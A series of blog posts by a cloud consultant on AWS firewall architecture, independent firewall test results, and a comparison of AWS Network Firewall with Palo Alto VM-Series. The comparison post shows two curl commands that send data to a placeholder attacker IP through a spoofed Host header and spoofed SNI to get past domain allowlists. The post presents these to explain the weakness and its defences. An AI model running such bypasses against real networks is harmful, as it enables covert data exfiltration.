So why do some AWS guides recommend two separate Security VPCs? The answer is resilience, not cost (TGW cross-AZ data transfer has been free since April 2022). With Appliance Mode ON, TGW uses a flow hash that can send traffic from a healthy AZ to appliances in an impaired AZ. With Appliance Mode OFF, AZ affinity isolates the blast radius - if AZ1 goes down, AZ2 traffic continues unaffected.

In practice, there are three options:

One Security VPC with Appliance Mode ON - works for both E-W and N-S. Simpler to manage, accepts the resilience trade-off. This is what most deployments use.
Two Security VPCs - one for E-W (Appliance Mode ON), one for N-S (Appliance Mode OFF). Maximum AZ isolation, but double the infrastructure and operational overhead.
One Security VPC with Appliance Mode OFF - breaks east-west inspection. Don't do this.

One more thing to keep in mind: in multi-account setups, AZ names map to different physical zones per account - use AZ IDs (e.g., use1-az1), not names.

Sources: AWS Whitepaper: GWLB with TGW for centralized security, AWS APN Blog: Centralized traffic inspection with GWLB

9. IMDSv2 and bootstrap - check your PAN-OS version

Not all versions of the PAN-OS VM-Series support IMDSv2. When I first encountered this problem, I thought I was going to lose all my hair. The process was standard: set the bootstrap in userdata, everything looked perfect, and... nothing bootstrapped. I scoured the internet for the problem, which turned out to be a single small checkbox in the virtual machine configuration - "Enable IMDSv2." I unchecked it, redeployed it with the same bootstrap - eureka! Everything is working as it should.

That was on an older PAN-OS version. The good news is that Palo Alto has been supporting IMDSv2 since 2022:

BYOL: PAN-OS 10.2.0+ with VM-Series Plugin 3.0.0+
PAYG: PAN-OS 10.2.5+ with Plugin 3.0.0+
Panorama: PAN-OS 10.2.3+

On a supported version, the only thing you need to set is the EC2 metadata options:

metadata_options {
  http_endpoint = "enabled"
  http_tokens   = "required"
}

Keep this in mind if your bootstrap fails for no obvious reason.

Sources: Palo Alto KB: IMDSv2 support for VM firewall and Panorama in AWS, VM-Series Plugin 3.0.0 Release Notes

So what should you do with all this information?

Generally, do what you feel is right, but I suggest answering a few important questions before implementing:

Is your environment truly sensitive enough to require centralized traffic inspection? Is the data stored in your environment highly sensitive? If you answered yes to both questions, then you need this solution. If you have any doubts, reconsider - maybe a native AWS firewall will suffice?

Do you have experience configuring Palo Alto firewalls? Without it, it will be difficult to get through the initial setup without wading through reams of documentation. It's not just the VM-Series configuration itself, but also the AWS configuration at both the network and resource levels. You can always ask Palo Alto for a dedicated specialist, who will handle this for you... But you'll also pay for that.

Consider whether you can afford this solution. It's not a small amount. Go through section 3 again and judge for yourself.

Remember that simply implementing VM-Series in production can be risky. It's good to have at least a minimal test environment to test your configuration before rolling it out to production, as you could shut down your business and not know why.

If you have no doubts about the above and are able to meet all of the above requirements, go for it; this solution is for you.

Building a centralized Security VPC on AWS with GWLB? I've deployed this architecture for enterprise clients and know where the bodies are buried. Let's talk.

AWS Network Firewall blocked 0.59% of exploits in independent testing - what this means for your cloud

Mariusz Gębala — Sun, 08 Mar 2026 20:30:55 +0000

In the spring of 2025, the results of a test comparing cloud firewalls were published on the CyberRatings.org laboratory website. Ten providers were included in the test. The AWS firewall blocked 0.59% of exploits.

When additional bypass tests were applied, the effectiveness dropped to 0%.

In my DevOps career, I have implemented both native AWS firewalls and those from Palo Alto (VM-Series and CNGFW). To this day, some customers still use the AWS firewall. This article is not a criticism; it is a realistic and objective (at least I hope so) look at what these numbers actually mean, what you should do with them, and what to keep in mind if you use the AWS Network Firewall.

Three rounds of testing, same result

First and foremost, it's worth noting: this wasn't a one-time test. CyberRatings tested the AWS firewall three times:

April 2024 - 11 vendors were tested for 984 exploits and 1,645 bypasses. AWS scored 5.39% security effectiveness - the lowest among all tested vendors. The rating was "Caution" (6 vendors received "Recommended," 1 "Neutral," and 4 "Caution").

November 2024 - Minitest. Only native AWS, Azure, and GCP firewalls were considered in the test. AWS achieved a result of 0.38% of blocked exploits (2 out of 522). Their counterparts - Azure 24.14%, GCP 50.57%. Keysight CyPerf v5.0 was used as the test platform.

April 2025 - Firewall Comparison Report for Q1 2025. Ten vendors were tested for 2,028 exploits and 2,500 attacks using 27 techniques. AWS (horror of horrors) 0.59%. After security bypass tests, 0%. For comparison - the largest vendors (Check Point, Fortinet, Juniper, Palo Alto Networks, Versa) from 99.61% to 100%. The differences are dramatic.

Wait - 0% doesn't mean "does nothing"

And here's a moment to pause - 0% doesn't mean the firewall is doing nothing. Before you give up on your AWS firewall, let me explain what these results really mean.

CyberRatings tests exploit blocking for known vulnerabilities (CVEs) from the last 10 years, plus resistance to evasion techniques at layers 3, 4, and 7 of the OSI model. The key is that AWS Network Firewall wasn't designed as an IPS/IDS in the traditional sense. It's a managed service built on Suricata with a specific set of features (domain filtering, IP/port rules, and OPTIONALLY managed threat signatures). Its primary purpose is network segmentation and traffic filtering - NOT catching exploits based on the CVE database.

The problem is that AWS sells its firewalls with advertising phrases like "intrusion prevention" and "threat detection." Well, since you're paying for IPS rule groups and just over half a percent of exploits are detected, it's probably a problem, regardless of the design assumptions.

Why such low results? Here's a technical explanation.

In my career, I've worked with both Suricata firewalls and those supporting App-ID. The difference stems from the underlying architecture.

Suricata in AWS NFW

AWS runs Suricata in the background. Suricata is an open-source IPS system, but AWS NFW does not support all of its functionality:

Lua scripts - most advanced Suricata rules use them for complex detection logic
File extraction - no downloading for analysis
iprep - no IP scoring
Datasets/datarep - no custom data matching
IKEv2 and IP-in-IP protocol detection
pcre is limited to working only with content, tls.sni, http.host, and dns.query

This shouldn't be underestimated. Lua scripts alone significantly enhance Suricata's detection. Without them, you're only using a fraction of its capabilities.

Stateful and Stateless Switching Problem

This is the technical cause of the problem identified by CyberRatings.

AWS NFW processes traffic in two stages. First, through the stateless engine (5-tuple matching), and then optionally through the stateful engine (Suricata). Unfortunately, stateless rules have a higher priority and typically interfere with stateful inspection.

CyberRatings documented that they followed AWS documentation. They also hired a certified AWS consultant to configure the firewall and worked directly with AWS engineers. Despite this, they still observed erroneous switching between the two engines. AWS best practice currently recommends setting the default stateless action to "Forward to Stateful Rule Groups" and avoiding stateless rules entirely. Simply put, you switch off half the firewall because it doesn't cooperate with the other half.
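The two-stage flow can be modeled in a few lines of Python. This is a toy sketch, not AWS's implementation: the `Packet` and `StatelessRule` types, the `EXPLOIT` signature, and the action names are made up for illustration (the real stateless actions are `aws:pass`, `aws:drop`, and `aws:forward_to_sfe`). It only shows why a stateless "pass" rule means Suricata never sees the packet.

```python
from dataclasses import dataclass
from typing import Callable, List


@dataclass
class Packet:
    dst_port: int
    payload: bytes


@dataclass
class StatelessRule:
    matches: Callable[[Packet], bool]
    action: str  # "pass", "drop", or "forward_to_stateful" (illustrative names)


def stateful_engine(pkt: Packet) -> str:
    """Stand-in for Suricata with a single made-up signature."""
    return "drop" if b"EXPLOIT" in pkt.payload else "pass"


def process(pkt: Packet, stateless_rules: List[StatelessRule],
            default_action: str = "forward_to_stateful") -> str:
    """Run the stateless stage first; only forwarded packets reach Suricata."""
    action = default_action
    for rule in stateless_rules:
        if rule.matches(pkt):
            action = rule.action
            break  # first matching stateless rule wins in this model
    if action == "forward_to_stateful":
        return stateful_engine(pkt)
    return action  # "pass" or "drop" decided without stateful inspection


malicious = Packet(dst_port=443, payload=b"...EXPLOIT...")
allow_443 = StatelessRule(matches=lambda p: p.dst_port == 443, action="pass")

# With a stateless pass rule the payload is never inspected.
with_stateless_rule = process(malicious, [allow_443])
# With no stateless rules the default action forwards to the stateful engine.
without_stateless_rules = process(malicious, [])
print(with_stateless_rule, without_stateless_rules)
```

With no stateless rules configured, every packet takes the default action and lands in the stateful engine, which is the configuration AWS recommends.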

Evasion is the real killer

The 0.59% exploit block rate is bad. The 0% evasion score is even worse.

CyberRatings tested 2,500 attacks using 27 evasion techniques at Layers 3, 4, and 7. When a firewall fails to handle evasions at the lower layers, the score drops dramatically - even if it blocks some exploits when they are sent unmodified. AWS NFW failed the evasion tests so badly that the few exploits it did detect no longer counted toward the overall score.

AWS has not publicly commented on or disputed the CyberRatings test results.

For context: bypass techniques include things like IP fragmentation, TCP segmentation, and protocol-level obfuscation. These are standard techniques used daily by penetration testers and real attackers. A production-grade firewall must be able to handle them.
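To see why TCP segmentation matters, here is a minimal Python sketch. It is a toy model and says nothing about how Suricata or any vendor actually matches traffic: the signature, the payload, and the 8-byte segment size are all assumptions chosen so the pattern straddles a segment boundary. The point is only that per-segment matching misses a pattern that stream reassembly catches.

```python
from typing import List, Tuple

Segment = Tuple[int, bytes]  # (byte offset in the stream, data)

SIGNATURE = b"/etc/passwd"  # hypothetical signature, for illustration only


def split_into_segments(payload: bytes, size: int) -> List[Segment]:
    """Cut a payload into fixed-size segments tagged with their offset."""
    return [(off, payload[off:off + size]) for off in range(0, len(payload), size)]


def per_segment_match(segments: List[Segment]) -> bool:
    """Naive inspection: look at each segment on its own."""
    return any(SIGNATURE in data for _, data in segments)


def reassembled_match(segments: List[Segment]) -> bool:
    """Reorder by offset, rebuild the stream, then inspect it as a whole."""
    stream = b"".join(data for _, data in sorted(segments))
    return SIGNATURE in stream


payload = b"GET /../../etc/passwd HTTP/1.1\r\n\r\n"
# Small segments, delivered out of order, as an evasion tool might send them.
evasive = list(reversed(split_into_segments(payload, 8)))

print(per_segment_match(evasive), reassembled_match(evasive))
```

Reassembly has to buffer and reorder data before any rule runs, which is part of why evasion handling costs CPU and latency.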

It's not just AWS - all three hyperscalers failed

Cloud Provider	Exploit Block Rate	Overall (after evasions)
AWS Network Firewall	0.59%	0%
Azure Firewall	55.28%	0%
GCP Cloud Firewall	96.60%	0%
Third-party average (5 vendors)	99.61-100%	99.61-100%

GCP blocked most of the exploits. But what good is that if the evasion tests still brought its overall score to 0%? Azure blocked only about half of the exploits and ended up at the same 0%.

So what's the conclusion? AWS isn't terrible. The problem is that cloud-native firewalls aren't designed as next-generation firewalls (NGFWs). As SDxCentral put it, "first-class cybersecurity firewall services aren't the highest priority for hyperscale cloud providers, whose first orders of business are to store and distribute data and not lose it."

Let's be honest about this. AWS provides the infrastructure, and they sell security features as a bonus. Companies like Palo Alto Networks, Fortinet, and Check Point are strictly security-focused. The priorities are different, and therefore, the results are different.

Who is CyberRatings anyway? Is it worth paying attention to them?

Contrary to appearances, this is a crucial question. Could they be deliberately trying to make AWS look bad? Let's examine their credibility.

CyberRatings.org is a non-profit organization founded in November 2020 by Vikram Phatak. Phatak founded NSS Labs in 2007 and managed it for over a decade - NSS Labs was the industry standard for independent firewall testing before its closure. CyberRatings is currently working with the revived NSS Labs as an official testing partner.

A few controversies: NSS Labs was involved in a legal dispute with CrowdStrike from 2017 to 2018, in which it admitted to "inaccurate" testing of the CrowdStrike Falcon endpoint product and subsequently filed an antitrust lawsuit against CrowdStrike, AMTSO, and several other vendors. The CrowdStrike portion was settled confidentially in 2019; the broader antitrust claims were dismissed by the court. This is a significant part of their history and worth knowing.

CyberRatings' AWS NFW testing was self-funded, with no vendor involvement. It used industry-standard test tooling (Keysight CyPerf), and the results were consistent across three separate rounds of testing over a 12-month period. The fact that the organization hired a certified AWS consultant and worked directly with AWS engineers makes the "misconfiguration" argument difficult to sustain.

Getting back to AWS Network Firewall... So what is it really good at?

Despite these test results, I still recommend AWS Network Firewall to clients. Here's why.

Domain-based outbound filtering. If you want to control which domains your workloads can reach, NFW does it well - especially with TLS inspection enabled to prevent SNI spoofing.

Network segmentation. VPC-to-VPC traffic control via Transit Gateway. IP and port-based rules. Basic allow/deny logic. This is exactly what most teams use it for.

Centralized logging. Full visibility of network flows thanks to native CloudWatch and S3 integration.

Zero operational overhead. No patching, no sizing, no HA configuration. It just works.

Compliance checkbox. For many compliance frameworks, having a firewall with logging and rules is a requirement - not a 99% score in an independent IPS test.

Cost. At $0.395/hour per endpoint (or $0.489 with TLS inspection), it costs roughly a quarter of what a Palo Alto VM-Series deployment does. And as of February 2026, AWS has eliminated additional data processing fees for advanced inspection.

These are real benefits. For a startup focused on basic outbound filtering or an internal application behind a transit gateway, NFW is the right tool. Just don't confuse it with an IPS system.

So what do third-party firewalls do differently?

The difference between 0.59% and 99.61% isn't due to budget or effort. It's about the architectural approach.

App-ID vs. signatures. Palo Alto's App-ID classifies traffic based on application behavior - payload inspection, behavioral patterns, protocol decoding - regardless of port. AWS Network Firewall classifies traffic based on port, protocol, and Suricata signatures. These are fundamentally different approaches. App-ID can distinguish legitimate HTTPS from a reverse shell tunneled over port 443. To Suricata, both appear as TLS on port 443.

Full evasion handling. Third-party firewalls reassemble fragmented packets, normalize protocols, and handle TCP segmentation before applying detection rules. This is why they withstand the evasion tests. It is computationally expensive and adds latency, but that's why you pay $3,000 per month instead of $750.

Continuous signature updates. Palo Alto's threat intelligence team updates signatures daily, addressing new CVEs. AWS managed rule groups update less frequently and include fewer signatures.

One note: third-party firewalls aren't perfect. For example, in CyberRatings' Q4 2025 test, Palo Alto Networks' PA-1410 firewall initially scored 0% in evasion resistance and a mere 46.37% overall. However (credit where credit is due), after updating PAN-OS to version 11.2.10, its evasion resistance rose to 100% and its overall score to 96.07%. The conclusion is simple: even dedicated security vendors have to keep patching their operating systems, and no vendor is permanently immune to vulnerabilities.

You've confused me... So what should I do?

If you're using AWS Network Firewall, here are my recommendations:

1. Understand what you're actually getting

NFW is a managed traffic filtering service. It's great for domain allow/deny lists, IP rules, and network segmentation. It's not an IPS that will detect known exploits. Adjust your expectations and security architecture accordingly.

2. Enable TLS Inspection

If you haven't already, enable TLS inspection. This costs an additional $0.094/hour per endpoint, but it mitigates the SNI spoofing bypass and provides real visibility into encrypted traffic.

3. Block QUIC

AWS NFW can't inspect QUIC traffic. HTTP/3 relies on QUIC. Add a stateful rule to block UDP/443 and force clients to fall back to TCP/TLS, where the firewall can actually monitor traffic.

4. Don't use stateless rules

Follow AWS best practices: set the default stateless action to "Forward to stateful rule groups." Don't configure stateless rules - they can interfere with stateful inspection. This interaction between the two engines is where CyberRatings saw the firewall break down.

5. Layered Security

NFW shouldn't be the only layer of security. Combine this with:

GuardDuty for threat detection (behavioral analysis, not signatures)
Security Hub for posture management
WAF in front of public-facing applications
VPC endpoint policies to restrict access to services
SCPs to prevent misconfigurations at the organizational level

6. If you need a true IPS system, deploy an external NGFW

For regulated industries (PCI-DSS, HIPAA, SOX), environments processing sensitive data, or organizations with active threat models involving targeted attacks, consider deploying an external NGFW on AWS. Check Point, Fortinet, Juniper, Palo Alto, and Versa all achieved scores of 99.61-100% in the same test, running on the same AWS infrastructure.

Interestingly, this doesn't mean you have to abandon NFW. I've actually seen many environments using both solutions. NFW for broad traffic filtering and an external NGFW provider in a centralized VPC for in-depth inspection.

The real question no one asks

The CyberRatings test measures how well a firewall blocks known exploits and resists evasion techniques. That matters. But it's not the whole picture.

Most AWS security incidents I've seen weren't caused by an attacker exploiting a CVE through the firewall. They were caused by:

Overly permissive IAM policies
S3 buckets with public access
Security groups open to everyone
Access keys that haven't been rotated in 900 days

The 17 checks I perform during every AWS audit reveal more real risk than any firewall result. A team that fixes these fundamental issues and runs AWS NFW with TLS inspection is more secure than a team that deploys Palo Alto VM-Series but leaves its root account without MFA.

Security is a matter of layers. Firewalls are one layer. Don't let the test result make you forget about the others.

Sources

CyberRatings.org, "Q1 2025 Cloud Network Firewall Test Results", April 2025
CyberRatings.org, "Cloud Network Firewall Comparative Test", April 2024
CyberRatings.org, "CSP Native Firewall Test Results", November 2024
CyberScoop, "Independent tests show why orgs should use third-party cloud security services", April 2025
SDxCentral, "Hyperscaler Cloud Firewalls Again Fail to Meet Basic Security Standards", April 2025
SDxCentral, "Is the AWS Network Firewall Safe?", May 2024
CyberRatings.org, "Follow-On Enterprise Firewall Results", 2025
AWS Documentation, "Suricata Limitations"
AWS Documentation, "Firewall Rules Engines"
AWS Documentation, "TLS Inspection Considerations"
AWS, "Network Firewall Pricing"
AWS, "Network Firewall Price Reduction", February 2026
Palo Alto Networks, "App-ID Technology"
Dark Reading, "NSS Labs Admits Falcon Test Inaccurate"

Originally published at haitmg.pl. Running AWS Network Firewall and want to understand your actual security posture? I audit cloud infrastructure for a living - from firewall rules to IAM policies to network architecture. Let's talk.

AWS Network Firewall vs Palo Alto VM-Series - what I learned after deploying both in production

Mariusz Gębala — Fri, 06 Mar 2026 09:42:49 +0000

I've deployed both AWS Network Firewall and Palo Alto VM-Series firewalls in production AWS environments. These were Security VPC architectures for enterprise clients across automotive, government, and cultural sectors - some with AWS Network Firewall, others with Palo Alto VM-Series behind a Gateway Load Balancer.

This is not a feature matrix from a vendor website. This is what I found after running both, what surprised me, and what you should know before choosing.

The short version

AWS Network Firewall is good enough for most workloads. It's native, managed, and cheap to start with. But it has a documented egress filtering bypass that lets an attacker circumvent your domain allowlist with a single curl command. If you're in a regulated industry or handle sensitive data, you need to understand this before committing.

Palo Alto VM-Series catches things AWS Network Firewall doesn't - but you pay for it in complexity, cost, and operational overhead. It's not a slam dunk either.

Where AWS Network Firewall works well

Let's start with what AWS gets right, because it gets a lot right.

Zero infrastructure to manage. No EC2 instances, no patching, no sizing. You create a firewall, attach it to a VPC, and it works. It scales automatically - there's no capacity planning conversation.

Native integration. Route tables, VPC, Transit Gateway - everything is first-party. No Gateway Load Balancer gymnastics, no GENEVE tunnels to debug. AWS Firewall Manager lets you deploy policies across an entire AWS Organization from a single place.

Suricata under the hood. The stateful engine runs Suricata rules, which means you can use any compatible threat intelligence feed. If your team already knows Suricata, the learning curve is minimal.

Cost for basic use cases. At $0.395/hour per endpoint plus $0.065/GB processed, it's cheaper than VM-Series for low-to-medium traffic volumes. No license fees, no subscriptions.

For a startup running a few services in a single VPC, or an internal application with basic egress filtering, AWS Network Firewall is perfectly adequate.

The egress filtering bypass that changes the conversation

Here's where things get interesting. In September 2023, security researcher Jianjun Huo documented a bypass in AWS Network Firewall's domain-based egress filtering. The vulnerability was also cataloged on Hacking the Cloud, a well-known AWS security research resource.

How it works

AWS Network Firewall uses the Server Name Indication (SNI) extension in TLS handshakes to determine which domain a client is connecting to. When you create a domain allowlist - say, only permit traffic to *.amazonaws.com and updates.example.com - the firewall checks the SNI field against your list.

The problem: the firewall does not verify that the destination IP address actually belongs to the domain declared in the SNI. AWS documentation explicitly states this:

"Network Firewall doesn't pause connections to do out-of-band DNS lookups."

AWS Network Firewall documentation

This means an attacker (or malware) inside your VPC can do this:

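# Placeholder for an attacker-controlled server
# (203.0.113.0/24 is reserved for documentation)
ATTACKER_IP="203.0.113.10"

# HTTP bypass - connect to the attacker's IP, spoof the Host header
curl -H "Host: updates.example.com" "http://${ATTACKER_IP}/exfiltrate"

# HTTPS bypass - pin the allowlisted name to the attacker's IP so the SNI is spoofed
# (--insecure because the attacker holds no valid certificate for that name)
curl --resolve "updates.example.com:443:${ATTACKER_IP}" \
     https://updates.example.com/exfiltrate --insecure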

The firewall sees updates.example.com in the SNI (or in the Host header for plain HTTP), checks it against the allowlist, and lets the traffic through. The actual TCP connection goes to the attacker's IP. Data exfiltrated. Allowlist bypassed.

This is not a theoretical attack. It's a documented technique used in post-exploitation scenarios, and it's closely related to domain fronting - a technique cataloged in the MITRE ATT&CK framework under T1090.004.
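The logic gap is easy to reproduce in a toy model. The Python sketch below is not how Network Firewall is implemented: the `ALLOWLIST`, the function names, and the documentation-range IP addresses are assumptions. It only mirrors the behavior described above, where the decision depends on the client-supplied name and never on the destination IP.

```python
import fnmatch

# Hypothetical domain allowlist, matching the example used in this article.
ALLOWLIST = ["*.amazonaws.com", "updates.example.com"]


def name_allowed(server_name: str) -> bool:
    """Check the client-supplied SNI / Host value against the allowlist."""
    name = server_name.lower()
    return any(fnmatch.fnmatchcase(name, pattern) for pattern in ALLOWLIST)


def firewall_decision(dst_ip: str, server_name: str) -> str:
    """Name-only filtering: dst_ip is accepted as input but never checked."""
    return "allow" if name_allowed(server_name) else "drop"


# Legitimate connection and spoofed connection look identical to the filter.
legit = firewall_decision("198.51.100.7", "updates.example.com")
spoofed = firewall_decision("203.0.113.10", "updates.example.com")
blocked = firewall_decision("203.0.113.10", "evil.example.net")
print(legit, spoofed, blocked)
```

Because the name is chosen by the client, any process that can set the SNI or Host header controls the outcome of the check.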

The mitigation - and its gaps

AWS added TLS inspection to Network Firewall, and as of early 2025, enabling TLS inspection blocks SNI spoofing by default. When TLS inspection is active, the firewall validates that the server certificate's domain matches the SNI in the client hello. If they don't match, the connection is dropped.

This is good. But it comes with significant caveats:

1. TLS 1.3 Encrypted Client Hello (ECH) and Encrypted SNI (ESNI) are not supported.

From the official AWS documentation:

"Traffic encrypted using TLS v1.3 Encrypted SNI and Encrypted Client Hello extensions aren't supported."

When Network Firewall encounters a client hello without a visible SNI (because it's encrypted), it closes the connection with a RST packet. So you get security - but at the cost of breaking legitimate traffic that uses ECH. As ECH adoption grows (and it is growing - major browsers and CDN providers are rolling it out), this becomes a bigger compatibility problem.

2. QUIC (UDP-based transport) is not inspectable.

HTTP/3 runs over QUIC. AWS Network Firewall cannot inspect QUIC traffic. The recommended workaround? Block UDP/443 entirely and force applications back to TCP. That works, but it's a blunt instrument.

3. TLS inspection adds cost and complexity.

Enabling TLS inspection bumps the endpoint cost from $0.395/hour to $0.489/hour. You also need to deploy and manage CA certificates on every host that sends traffic through the firewall - or accept that you're only inspecting a subset of your traffic.

4. Existing connections are dropped when you enable TLS inspection.

Adding TLS inspection to a running firewall interrupts existing traffic flows. This means you can't just flip it on during business hours.

How Palo Alto handles the same scenario

Palo Alto VM-Series approaches this differently at a fundamental level.

App-ID vs port-based filtering

AWS Network Firewall classifies traffic by port, protocol, and domain (via SNI/Host header). Palo Alto's App-ID classifies traffic by application identity, regardless of port. It inspects packet payloads, analyzes behavioral patterns, and matches traffic against a library of thousands of application signatures.

This means App-ID can tell the difference between "legitimate HTTPS to aws.amazon.com" and "reverse shell tunneled over port 443 pretending to be HTTPS to aws.amazon.com." Port 443 is port 443 to AWS Network Firewall. To Palo Alto, they're two completely different applications.

Built-in domain fronting detection

Starting with PAN-OS 10.2, Palo Alto firewalls with Threat Prevention or Advanced Threat Prevention can detect domain fronting attempts. When the domain in the SNI field differs from the HTTP Host header, the firewall generates a threat log entry with threat ID 86467 (classified as a Spyware signature).

This is exactly the attack that bypasses AWS Network Firewall's domain filtering.

The detection works because Palo Alto inspects both the certificate's Common Name / Subject Alternative Name fields AND the SNI, and can automatically deny sessions where they don't match. AWS Network Firewall only gained similar capability through TLS inspection - and as noted above, with limitations.
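Both comparisons described in this section can be sketched in Python. This is an illustration of the idea, not PAN-OS logic: the `DecryptedSession` type, the finding labels, and the simplified wildcard matching (one label only, no IPv6 literals in the Host header) are assumptions made for the example.

```python
from dataclasses import dataclass
from typing import List


@dataclass
class DecryptedSession:
    sni: str               # server name from the TLS ClientHello
    http_host: str         # Host header, visible only after decryption
    cert_names: List[str]  # CN/SAN entries from the server certificate


def name_matches(hostname: str, pattern: str) -> bool:
    """Exact match, or a leading '*.' wildcard covering exactly one label."""
    hostname, pattern = hostname.lower(), pattern.lower()
    if pattern.startswith("*."):
        suffix = pattern[1:]  # e.g. ".example.com"
        if not hostname.endswith(suffix):
            return False
        prefix = hostname[:-len(suffix)]
        return prefix != "" and "." not in prefix
    return hostname == pattern


def findings(session: DecryptedSession) -> List[str]:
    """Return mismatch labels; an empty list means the names are consistent."""
    result = []
    host = session.http_host.split(":")[0].lower()  # drop an optional port
    if session.sni.lower() != host:
        result.append("sni_host_mismatch")  # domain fronting pattern
    if not any(name_matches(session.sni, n) for n in session.cert_names):
        result.append("sni_cert_mismatch")  # spoofed SNI pattern
    return result


fronted = DecryptedSession("updates.example.com", "c2.attacker.example", ["*.example.com"])
spoofed = DecryptedSession("updates.example.com", "updates.example.com", ["attacker.example"])
clean = DecryptedSession("updates.example.com", "updates.example.com:443", ["*.example.com"])
print(findings(fronted), findings(spoofed), findings(clean))
```

Note that the first check needs the decrypted Host header, while the second only needs the handshake, which is why the two detections have different prerequisites.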

What Palo Alto doesn't solve

I'm not going to pretend VM-Series is perfect. Here's what you're signing up for:

You manage EC2 instances. VM-Series runs on EC2. You're responsible for instance sizing, patching PAN-OS, HA configuration, and monitoring. When Palo Alto releases a critical security update (and they do - CVE-2024-9468 was a DoS vulnerability in the threat prevention engine), you're the one applying it.

Gateway Load Balancer complexity. The recommended production architecture uses a centralized Security VPC with a Gateway Load Balancer distributing traffic across VM-Series instances. This means GENEVE encapsulation, appliance mode on Transit Gateway attachments, four separate subnets per AZ in the Security VPC (management, data, TGW, public), and careful route table configuration. It works beautifully when set up correctly. Getting there is not trivial.

Cost. A VM-Series PAYG instance on the AWS Marketplace starts at $1.71/hour for a c5n.xlarge (the recommended instance type). That's the software license alone - add the EC2 instance cost on top. For HA (which you want in production), double it. For multi-AZ, multiply again.

Domain fronting detection requires SSL Decryption. Threat ID 86467 only works when the traffic is decrypted - either through SSL Forward Proxy or SSL Inbound Inspection. Without decryption, the firewall can't see the HTTP Host header to compare it against the SNI. By default, the signature action is allow with informational severity - you need to explicitly create a threat exception to block it.

The cost math

Let's compare a realistic production scenario: a centralized Security VPC in eu-central-1, two AZs, processing 500 GB of traffic per month.

AWS Network Firewall (with TLS inspection)

Component	Monthly cost
2 firewall endpoints x $0.489/h x 730h	$714
500 GB x $0.065/GB	$33
Total	~$747/month

Palo Alto VM-Series (PAYG, HA pair)

Component	Monthly cost
2 x VM-Series license x $1.71/h x 730h	$2,497
2 x c5n.xlarge EC2 x ~$0.34/h x 730h	$496
Gateway Load Balancer x $0.0125/h x 730h	$9
GWLB data x $0.004/GB x 500 GB	$2
Total	~$3,004/month

That's a 4x cost difference. For some organizations, the additional security capabilities justify this. For others, they absolutely don't.
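For anyone who wants to plug in their own numbers, the arithmetic behind both tables fits in a short Python sketch. The prices, the 730-hour month, and the 500 GB of traffic are taken from the tables above; the variable names are mine. The unrounded totals differ from the table totals by less than a dollar because the tables sum already-rounded rows.

```python
HOURS_PER_MONTH = 730
TRAFFIC_GB = 500

# AWS Network Firewall with TLS inspection, two endpoints (one per AZ)
nfw = {
    "endpoints": 2 * 0.489 * HOURS_PER_MONTH,
    "data_processing": TRAFFIC_GB * 0.065,
}

# Palo Alto VM-Series PAYG, HA pair behind a Gateway Load Balancer
vm_series = {
    "licenses": 2 * 1.71 * HOURS_PER_MONTH,
    "ec2_c5n_xlarge": 2 * 0.34 * HOURS_PER_MONTH,  # approximate hourly rate
    "gwlb_hourly": 0.0125 * HOURS_PER_MONTH,
    "gwlb_data": 0.004 * TRAFFIC_GB,
}

nfw_total = sum(nfw.values())
vm_total = sum(vm_series.values())
ratio = vm_total / nfw_total

for name, costs in (("AWS Network Firewall", nfw), ("VM-Series", vm_series)):
    for item, cost in costs.items():
        print(f"{name:22} {item:16} ${cost:,.2f}")
print(f"Totals: ${nfw_total:,.2f} vs ${vm_total:,.2f} ({ratio:.1f}x)")
```

Changing `TRAFFIC_GB` shows how little the ratio depends on volume at this scale: the hourly charges dominate both bills.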

The breakeven conversation is not about GB processed - it's about what a security incident would cost you. If you're a fintech handling payment data, $3,000/month for a firewall that can actually detect domain fronting is cheap. If you're running internal dev tooling, AWS Network Firewall with TLS inspection is plenty.

When to use which

Scenario	Recommendation	Why
Internal workloads, basic egress filtering	AWS Network Firewall	Simple, cheap, managed
Multi-VPC with centralized inspection	Either - depends on budget	Both support Transit Gateway architectures
PCI-DSS, HIPAA, SOX compliance	VM-Series	App-ID, granular logging, proven compliance track record
Hybrid cloud (AWS + on-prem)	VM-Series	Same policies, same Panorama management plane
Domain fronting / C2 detection required	VM-Series	Built-in detection (Threat ID 86467)
Budget under $1,000/month for firewall	AWS Network Firewall	VM-Series can't compete on price
Team without Palo Alto expertise	AWS Network Firewall + TLS inspection	VM-Series has a learning curve
Existing Palo Alto on-prem investment	VM-Series	Reuse policies, skills, and Panorama

What I actually recommend to clients

I don't tell every client to deploy Palo Alto. That would be irresponsible.

For most startups and SMBs I work with, I recommend AWS Network Firewall with TLS inspection enabled from day one. It covers 90% of use cases, costs a fraction of VM-Series, and doesn't require specialized Palo Alto expertise to maintain.

But I always make sure they understand what it doesn't catch. I walk them through the SNI bypass scenario. I explain the ECH/QUIC gaps. And if they're in a regulated industry, or if they've had a security incident involving data exfiltration, or if they already run Palo Alto on-premises - then we talk about VM-Series and the centralized Security VPC architecture with Gateway Load Balancer.

The worst outcome is deploying AWS Network Firewall with a domain allowlist and believing you're protected against data exfiltration. You're not. You're protected against accidental connections to the wrong domain. A determined attacker will walk right through it without TLS inspection - and even with TLS inspection, there are gaps.

Security architecture is about understanding what your controls actually stop, and what they don't.

Sources

Jianjun Huo, "AWS Network Firewall egress filtering can be easily bypassed", September 2023 (updated February 2025)
Hacking the Cloud, "AWS Network Firewall Egress Filtering Bypass"
AWS Documentation, "TLS inspection considerations"
AWS, "Network Firewall Pricing"
AWS re:Post, "Prevent AWS Network Firewall host header spoofing"
MITRE ATT&CK, "Domain Fronting T1090.004"
Palo Alto Networks, "Domain Fronting Detection - PAN-OS 10.2"
Palo Alto Networks, "How Palo Alto Networks identifies HTTPS applications without decryption"
Palo Alto Networks, "VM-Series Integration with AWS Gateway Load Balancer"
AWS Marketplace, "VM-Series Next-Gen Virtual Firewall PAYG"
Palo Alto Networks LIVEcommunity, "How to detect domain fronting"

Designing a Security VPC for AWS with centralized traffic inspection? I've done this for enterprise clients across multiple industries. Let's talk.

Why Every Terraform Module Needs Proper Validation

Mariusz Gębala — Thu, 05 Mar 2026 11:01:13 +0000

If you've ever deployed a Terraform module only to discover that someone passed a private subnet ID where a public one was expected, you know the pain. The deployment "succeeds", but nothing works. You spend 30 minutes debugging, only to realize the input was wrong from the start.

Terraform has tools to prevent this. Most people don't use them.

The Problem: Silent Misconfiguration

Consider a simple NAT Gateway module:

variable "subnet_id" {
  description = "Subnet to place the NAT Gateway in"
  type        = string
}

resource "aws_nat_gateway" "this" {
  allocation_id = aws_eip.this.id
  subnet_id     = var.subnet_id
}

